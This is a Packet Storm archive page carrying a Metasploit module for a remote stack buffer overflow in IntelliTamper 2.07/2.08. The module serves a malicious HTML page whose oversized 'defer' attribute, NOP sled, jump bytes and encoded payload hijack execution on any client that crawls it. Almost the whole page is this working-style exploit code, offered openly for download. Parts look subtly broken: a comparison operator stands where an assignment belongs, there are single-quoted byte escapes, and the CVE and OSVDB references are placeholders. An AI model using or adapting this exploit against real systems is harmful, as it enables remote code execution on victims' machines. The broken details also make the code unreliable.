exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

IntelliTamper 2.07/2.08 (defer) Remote Buffer Overflow

IntelliTamper 2.07/2.08 (defer) Remote Buffer Overflow
Posted Jan 24, 2010
Authored by Stack | Site metasploit.com

This Metasploit module exploits a stack overflow in the IntelliTamper. By sending an overly long string to the "defer" script, an attacker may be able to execute arbitrary code.

tags | exploit, overflow, arbitrary
SHA-256 | 5a7d05045fcaafffeec567421bc387b0c5e71f7d8dcecd67bd46ed81f239decd

IntelliTamper 2.07/2.08 (defer) Remote Buffer Overflow

Change Mirror Download
##
# $Id: IntelliTamper.rb
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'IntelliTamper 2.07/2.08 (defer) Remote Buffer Overflow ',
'Description' => %q{
This module exploits a stack overflow in the IntelliTamper.
By sending an overly long string to the "defer"
script, an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'Stack, Mountassif Moad' ],
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.exploit-db.com/exploits/11220'],
[ 'CVE', '2009-0' ],
[ 'OSVDB', '0' ],
[ 'BID', '00, 01' ],
[ 'EDB', '11220' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 950,
'BadChars' => "\x00\x3C\x01",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'IntelliTamper 2.07/2.08', { 'Offset' => 6236, 'Ret' => 0x0040103b } ], # intellitamper.exe
],
'DisclosureDate' => 'Jan 22 2009',
'DefaultTarget' => 0))
end


def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)

# Set the exploit buffer

sploit == '<html><head><title>loneferret test</title></head><body>'
sploit += '<script defer="'
sploit += "\x41" * 6236
sploit += make_nops(180)
sploit += '\xE9\x55\xFE\xFF\xFF'
sploit += '\xeb\xd0\x90\x90'
sploit += [target.ret].pack('V')
sploit += make_nops(50)
sploit += payload.encoded
sploit += '">'
sploit += '</body></html>'
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

# Transmit the response to the client
send_response_html(cli, sploit)

# Handle the payload
handler(cli)
end

end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close